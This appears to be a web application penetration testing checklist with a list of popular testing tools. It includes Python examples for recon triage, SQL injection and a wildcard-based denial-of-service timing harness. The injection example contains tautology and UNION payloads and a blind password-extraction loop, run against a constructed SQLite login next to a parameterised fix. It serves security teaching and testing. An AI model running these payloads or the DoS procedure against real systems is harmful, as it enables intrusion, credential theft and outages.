Web application penetration testing is a method of identifying, analyzing and reporting the vulnerabilities present in a web application, including buffer overflows, input validation flaws, code execution, authentication bypass, SQL injection, CSRF and cross-site scripting, in the target application that is in scope for the test.
A repeatable, methodical process is one of the best ways to conduct web application penetration testing across all kinds of web application vulnerabilities, and the checklist below is organized that way.
Web Application Penetration Testing Checklist
Information Gathering
1. Retrieve and analyze the robots.txt file, for example with GNU Wget; its Disallow entries point at paths the owner would rather not have crawled.
2. Examine software versions, database details and the technical components behind error messages by requesting invalid pages and studying the error codes and error pages returned.
3. Use DNS techniques such as reverse (PTR) lookups, DNS zone transfers and web-based DNS searches.
4. Perform directory enumeration and vulnerability scanning, and probe for URLs, using tools such as Nmap and Nessus.
5. Identify the entry points of the application (parameters, forms, cookies, headers) using Burp Proxy, OWASP ZAP, TamperIE, WebScarab or Tamper Data.
6. Using traditional fingerprinting tools such as Nmap and Amap, perform TCP/ICMP and service fingerprinting.
7. Test for recognized file types, extensions and directories by requesting common file extensions such as .ASP, .EXE, .HTML and .PHP.
8. Examine the source code of the accessible pages of the application front end.
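The information-gathering steps above produce raw material (a robots.txt, response headers, verbose error pages, form fields) that has to be turned into a list of leads. The following is an added example, not code from the original checklist or from any of the tools it names: it parses a constructed robots.txt and a handful of constructed responses (the host, paths, banners and error text are all made up for the example) and extracts candidate entry points, product versions and information leaks the later test phases will use.

```python
import re

# Constructed sample data for this example: a robots.txt and a few probed
# responses of the form (status, headers, body). Not captured from a real host.
ROBOTS_TXT = """User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /api/v1/internal
Allow: /
Sitemap: https://example.test/sitemap.xml
"""

SAMPLE_RESPONSES = {
    "/": (200, {"Server": "Apache/2.4.29 (Ubuntu)", "X-Powered-By": "PHP/7.2.24"},
          "<html><body>Welcome</body></html>"),
    "/zz-not-a-real-page-4711": (404, {"Server": "Apache/2.4.29 (Ubuntu)"},
          "<h1>Not Found</h1>"),
    "/admin/login.php": (200, {"Server": "Apache/2.4.29 (Ubuntu)", "X-Powered-By": "PHP/7.2.24"},
          "<form method='post'><input name='user'>"
          "<input name='pass' type='password'></form>"),
    "/api/v1/internal?id='": (500, {"Server": "Apache/2.4.29 (Ubuntu)"},
          "Fatal error: Uncaught PDOException: SQLSTATE[42000]: syntax error; "
          "MySQL server version 5.7.32 in /var/www/html/api/db.php on line 42"),
}

PRODUCT_RE = re.compile(r"([A-Za-z][\w.-]*)/(\d+(?:\.\d+)+)")
LEAK_PATTERNS = {
    "server-side path": re.compile(r"(?:/var/www|/home/|[A-Z]:\\)[\w./\\-]*"),
    "database version": re.compile(
        r"(?:MySQL|PostgreSQL|Microsoft SQL Server|Oracle)[^;\n]{0,40}?\d+(?:\.\d+)+"),
    "exception detail": re.compile(r"\b(?:Uncaught|Exception|Traceback|stack trace)\b", re.I),
}


def parse_robots(text):
    """Disallow entries: paths the owner hides from crawlers, so probe them first (step 1)."""
    paths = []
    for line in text.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


def fingerprint_headers(headers):
    """Product/version pairs from Server and X-Powered-By banners (step 2)."""
    found = {}
    for name in ("Server", "X-Powered-By"):
        for product, version in PRODUCT_RE.findall(headers.get(name, "")):
            found[product] = version
    return found


def find_leaks(body):
    """Kinds of technical detail a verbose error page gives away (step 2)."""
    return [kind for kind, rx in LEAK_PATTERNS.items() if rx.search(body)]


def find_inputs(body):
    """Form field names: the entry points that later input tests will target (step 5)."""
    return re.findall(r"<input[^>]*\bname=['\"]([^'\"]+)", body)


def triage(robots_txt, responses):
    """Combine the checks into one sorted list of (category, detail) findings."""
    findings = {("robots-disallow", p) for p in parse_robots(robots_txt)}
    for path, (status, headers, body) in responses.items():
        for product, version in fingerprint_headers(headers).items():
            findings.add(("version", f"{product} {version}"))
        if status >= 500:
            for kind in find_leaks(body):
                findings.add(("leak", f"{path}: {kind}"))
        for name in find_inputs(body):
            findings.add(("input", f"{path}: {name}"))
    return sorted(findings)


if __name__ == "__main__":
    for category, detail in triage(ROBOTS_TXT, SAMPLE_RESPONSES):
        print(f"{category:16} {detail}")
```

In a real engagement the responses would come from a proxy's history or a fetch script; the point of separating the parsers from the data is that the same triage runs over whatever was captured, and every finding records the path that produced it so it can be reproduced in the report.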
Data Validation Testing
1. Perform source code analysis for JavaScript coding errors.
2. Perform standard, UNION-based and blind SQL injection testing, using tools such as sqlninja, SQLDumper and SQL Power Injector.
3. Analyze the HTML code, test for stored XSS and check what a stored XSS can be leveraged into, using tools such as XSS Proxy, BackFrame, Burp Proxy, OWASP ZAP and XSS Assistant.
4. Perform LDAP injection testing to extract sensitive information about users and hosts.
5. Perform IMAP/SMTP injection testing to reach the back-end mail server.
6. Perform XPath injection testing to access confidential information.
7. Perform XML injection testing to learn about the XML structure the application consumes.
8. Perform code injection testing to identify input validation errors.
9. Perform buffer overflow testing for stack and heap memory corruption and control of the application's flow.
10. Test for HTTP splitting and smuggling, which can be used to inject cookies and HTTP redirect information.
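Step 2 names three SQL injection techniques (standard, UNION-based and blind). The following added example, which is not code from the original checklist or from any of the tools it lists, runs all three against a constructed login function backed by an in-memory SQLite database, and runs the same tests against the parameterised version of that function to show what a negative result looks like. The schema, rows, credentials and function names are all assumptions made for the example.

```python
import sqlite3


def make_db():
    """Constructed sample schema and rows for this example (in-memory SQLite)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users (username, password, role) VALUES
            ('alice', 's3cret', 'admin'),
            ('bob', 'hunter2', 'user');
    """)
    return conn


def login_vulnerable(conn, username, password):
    """Query assembled with string formatting: user input is parsed as SQL."""
    sql = ("SELECT username, role FROM users "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchall()


def login_fixed(conn, username, password):
    """Parameterised query: input is bound as data and can never change the SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Payloads for the first two tests named in step 2 above.
TAUTOLOGY = "' OR '1'='1"                                       # standard injection
UNION_SCHEMA = "' UNION SELECT name, sql FROM sqlite_master --"  # UNION injection


def blind_extract(conn, login, target_user, max_len=16,
                  alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Boolean-based blind injection: recover target_user's password one
    character at a time, using only whether the login returns a row."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = f"{target_user}' AND substr(password,{pos},1)='{ch}' --"
            if login(conn, probe, "x"):
                recovered += ch
                break
        else:
            break  # no candidate matched: end of string, or not injectable
    return recovered


def run_tests(conn, login):
    """Apply the three injection tests to a login function; True = injectable."""
    return {
        "standard": len(login(conn, TAUTOLOGY, TAUTOLOGY)) > 1,
        "union": any(row[0] == "users" for row in login(conn, UNION_SCHEMA, "x")),
        "blind": blind_extract(conn, login, "alice") != "",
    }


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", run_tests(conn, login_vulnerable))
    print("recovered via blind injection:", blind_extract(conn, login_vulnerable, "alice"))
    print("fixed:     ", run_tests(conn, login_fixed))
```

The UNION payload reads sqlite_master because that is where SQLite keeps its schema; against MySQL or PostgreSQL the same idea targets information_schema, and the column count and types of the injected SELECT must match the original query. The blind loop is deliberately slow and noisy (one request per candidate character), which is why blind testing is usually automated, but it needs nothing from the application except a true/false difference in behaviour.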
Denial of Service Testing
1. Send a large number of requests that perform database operations and observe any slowdown and any new error messages.
2. Perform manual source code analysis and submit inputs of a range of lengths to the application.
3. Test for SQL wildcard attacks, where a search term full of wildcards (for example LIKE '%a%a%a%b') forces the database into expensive pattern matching.
4. Test user-specified object allocation: check whether there is a maximum number of objects the application will allocate on request.
5. Enter an extremely large number in any input field the application uses as a loop counter.
6. Use a script to automatically submit an extremely long value so that the server has to log the request.
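Steps 1 to 3 amount to one procedure: submit inputs of increasing size and decide whether response time grows faster than the input does. The following added example, not code from the original checklist, is a small harness for that: the handler under test is a constructed SQLite-backed search whose user input lands in a LIKE pattern, the table contents and the wildcard term are made up for the example, and the verdict logic is separated from the timing so it can be applied to measurements taken against a real target too. SQLite's LIKE matcher backtracks through every candidate position for each '%' in the pattern; how steeply that grows on a given build is exactly what the harness measures.

```python
import sqlite3
import time


def make_db(rows=30, width=25):
    """Constructed sample table: 'rows' product names of 'width' identical characters."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?)",
                     (("a" * width,) for _ in range(rows)))
    return conn


def search(conn, term):
    """The application's search handler: the user's term lands inside a LIKE pattern."""
    return conn.execute("SELECT count(*) FROM products WHERE name LIKE ?",
                        ("%" + term + "%",)).fetchone()[0]


def wildcard_term(n):
    """n wildcard groups followed by a character that never occurs in the data,
    so the matcher has to try every combination before it can fail."""
    return "%a" * n + "%b"


def timed(fn, *args):
    start = time.perf_counter()
    fn(*args)
    return time.perf_counter() - start


def measure(conn, sizes):
    """Step 2: submit inputs of increasing size and record each response time."""
    return [(n, timed(search, conn, wildcard_term(n))) for n in sizes]


def growth_ratios(results):
    """Response-time ratio between consecutive sizes (about 1 means flat)."""
    return [later / earlier if earlier > 0 else float("inf")
            for (_, earlier), (_, later) in zip(results, results[1:])]


def classify(results, threshold=2.0, noise_floor=0.001):
    """'superlinear' when every step whose response time is above the noise floor
    multiplies the time by at least 'threshold'; 'flat' otherwise; 'inconclusive'
    when fewer than two measurements rose above the noise floor."""
    steps = [(t, r) for (_, t), r in zip(results[1:], growth_ratios(results))
             if t >= noise_floor]
    if len(steps) < 2:
        return "inconclusive"
    return "superlinear" if all(r >= threshold for _, r in steps) else "flat"


if __name__ == "__main__":
    conn = make_db()
    results = measure(conn, range(2, 7))
    for n, t in results:
        print(f"{n:2d} wildcard groups: {t * 1000:8.2f} ms")
    print("verdict:", classify(results))
```

Keep the sizes small when pointing this at a live system: the whole point of a positive result is that the next step up may take the service down, so stop at the first clear super-linear step and report it. On the defensive side, SQLite caps LIKE pattern length (SQLITE_MAX_LIKE_PATTERN_LENGTH) for this reason; an application should likewise bound the length and wildcard count of search terms before they reach the database.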
Top 10 Best Penetration Testing (Pen Test) VAPT Tools in 2021
1) Netsparker
Netsparker is an easy-to-use web application security scanner that can automatically find SQL injection, XSS and other vulnerabilities in your web applications and web services. It is available as an on-premises and as a SaaS solution.
Features
Accurate vulnerability detection with its Proof-Based Scanning technology, which confirms a finding rather than only reporting it.
Minimal configuration required. Scanner automatically detects URL rewrite rules, custom 404 error pages.
REST API for seamless integration with the SDLC, bug tracking systems etc.
Fully scalable solution. Scan 1,000 web applications in just 24 hours.
2) Acunetix
Acunetix is a fully automated web vulnerability scanner. It accurately scans HTML5, JavaScript and single-page applications, can audit complex, authenticated web apps, and issues compliance and management reports on a wide range of web and network vulnerabilities, including out-of-band vulnerabilities.
Features:
Scans for all variants of SQL Injection, XSS, and 4500+ additional vulnerabilities
Detects over 1200 WordPress core, theme, and plugin vulnerabilities
Fast & Scalable – crawls hundreds of thousands of pages without interruptions
Integrates with popular WAFs and Issue Trackers to aid in the SDLC
Available On Premises and as a Cloud solution.
3) Intruder
Intruder is an automated vulnerability scanner that discovers security weaknesses across your IT environment. It offers a large library of security checks, continuous monitoring and an easy-to-use platform for businesses of all sizes.
Features
Best-in-class threat coverage with over 10,000 security checks
Checks for configuration weaknesses, missing patches, application weaknesses (such as SQL injection & cross-site scripting) and more
Automatic analysis and prioritisation of scan results
Intuitive interface, quick to set-up and run your first scans
Proactive security monitoring for the latest vulnerabilities
AWS, Azure and Google Cloud connectors
API integration with your CI/CD pipeline
4) Indusface
Indusface WAS offers manual Penetration testing and automated scanning to detect and report vulnerabilities based on OWASP top 10 and SANS top 25.
Features
Crawler scans single page applications
Pause and resume feature
Manual PT and Automated scanner reports displayed in the same dashboard
Unlimited proof-of-concept requests offer evidence for reported vulnerabilities and help eliminate false positives from automated scan findings
Optional WAF integration to provide instant virtual patching with zero false positives
Automatically expands crawl coverage based on real traffic data from the WAF (if the WAF is subscribed to and in use)
24×7 support to discuss remediation guidelines/POC
5) Intrusion Detection Software
Intrusion Detection Software is a tool that enables you to detect many types of advanced threats. It provides compliance reporting for PCI DSS and HIPAA. This application can continuously monitor for suspicious attacks and activity.
Features:
Minimize intrusion detection efforts.
Offers compliance with effective reporting.
Provides real time logs.
It can detect malicious IPs, applications, accounts, and more.
6) TraceRoute
TraceRoute is an application that enables you to analyze the network path to a host. This software can identify IP addresses, hostnames and packet loss. It provides accurate analysis through a command line interface.
Features:
It offers both TCP and ICMP network path analysis.
This application can create a txt logfile.
Supports both IPv4 and IPv6.
Detects path changes and notifies you.
Allows continuous probing of a network.
7) ExpressVPN
ExpressVPN secures internet browsing against surveillance and scammers. It offers unrestricted access to music, social media and video, and the service states that it does not log IP addresses, browsing history, DNS queries or traffic destinations. It is a privacy tool for the tester's own traffic rather than a tool for testing a target.
Features:
Servers in 160 locations and 94 countries
Connect to the VPN without any bandwidth limitation.
Provides online protection using leak proofing and encryption.
Stay secure by hiding IP address and encrypting your network data.
Assistance is available 24/7 via email as well as live chat.
Pay with Bitcoin and use Tor in order to access hidden sites.
8) Owasp
The Open Web Application Security Project (OWASP) is a worldwide non-profit organization focused on improving the security of software. The project has multiple tools to pen test various software environments and protocols. Flagship tools of the project include
Zed Attack Proxy (ZAP – an integrated penetration testing tool)
OWASP Dependency-Check (it scans a project's dependencies and checks them against known vulnerabilities)
OWASP Web Testing Environment Project (collection of security tools and documentation)
The OWASP Testing Guide gives "best practice" guidance for penetration testing the most common web application
9) WireShark
Wireshark is a network analysis tool previously known as Ethereal. It captures packets in real time and displays them in a human-readable format. Basically, it is a network packet analyzer which provides the minute details of your network protocols, decryption, packet information, etc. It is open source and can be used on Linux, Windows, OS X, Solaris, NetBSD, FreeBSD and many other systems. The information retrieved by this tool can be viewed through a GUI or, in TTY mode, with the TShark utility.
WireShark features include
Live capture and offline analysis
Rich VoIP analysis
Capture files compressed with gzip can be decompressed on the fly
Output can be exported to XML, PostScript, CSV or plain text
Multi-platform: Runs on windows, Linux, FreeBSD, NetBSD and many others
Live data can be read from Ethernet, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, etc.
Decryption support for many protocols, including IPsec, ISAKMP, SSL/TLS, WEP and WPA/WPA2
For quick intuitive analysis, coloring rules can be applied to the packet
Read/Write many different capture file formats
10) w3af
w3af is a web application attack and audit framework. It has three types of plugins, discovery, audit and attack, that work together to find vulnerabilities in a site: for example, a discovery plugin in w3af looks for different URLs to test and forwards them to the audit plugins, which then use those URLs to search for vulnerabilities.
It can also be configured to run as a MITM proxy. An intercepted request can be sent to the request generator, and manual web application testing can then be performed by varying its parameters. It also has features to exploit the vulnerabilities it finds.
W3af features
Proxy support
HTTP response cache
DNS cache
File uploading using multipart
Cookie handling
HTTP basic and digest authentication
User agent faking
Add custom headers to requests